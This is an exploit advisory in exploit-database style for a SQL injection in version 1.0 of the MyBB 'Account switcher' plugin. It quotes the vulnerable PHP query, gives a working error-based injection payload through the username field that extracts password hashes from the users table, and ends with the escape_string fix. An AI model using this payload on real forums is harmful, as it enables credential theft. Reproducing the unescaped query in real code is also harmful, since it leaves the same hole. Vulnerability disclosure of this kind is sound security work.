# Exploit Title: MyBB Plugin Account switcher <= 1.0 SQL injection # Date: 19/01/2013 # Exploit Author: Kallimero # Vendor Homepage: http://mods.mybb.com/view/account-switcher-1-0 # Version: 1.0 # Tested on: Debian Vulnz ======== The mybb plugin named Account switcher is vulnerable to a sql injection. ---------------[sitemap.php]--------------- <?php if($mybb->input['action'] == "as_attach" && $mybb->input['select'] == "attachme" && $mybb->request_method == "post") { verify_post_check($mybb->input['my_post_key']); // check if current user is already attached if($mybb->user['as_uid'] != "0") error($lang->as_alreadyattached); // validate input $select = htmlspecialchars_uni($mybb->input['select']); $username = htmlspecialchars_uni($mybb->input['username']); $password = htmlspecialchars_uni($mybb->input['password']); // get the target $target=$db->fetch_array($db->simple_select("users", "uid, usergroup", "username='{$username}'")); ?> ---------------[sitemap.php]--------------- htmlspecialchars_uni() don't really sanitarize the input. Therefore we can inject SQL code through username. Sorry, it's not a tricky SQL injection this time... Here is the PoC (error-based): username=1' and (select 1 from (select count(*),concat((select password FROM mybb_users LIMIT 0,1 ),0x7e, floor(rand(0)*3)) as e from information_schema.tables group by e) a)-- - How to Fix ? ============ A simple $db->escape_string() on the vulnerable fields would fix it. htmlspecialschars and friends don't let you avoid SQL injection. Real functions do that job well, and are made for that ($db->espace_string in mybb). Thanks ========= All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s. Please visit : http://hwc-crew.org/
Groucho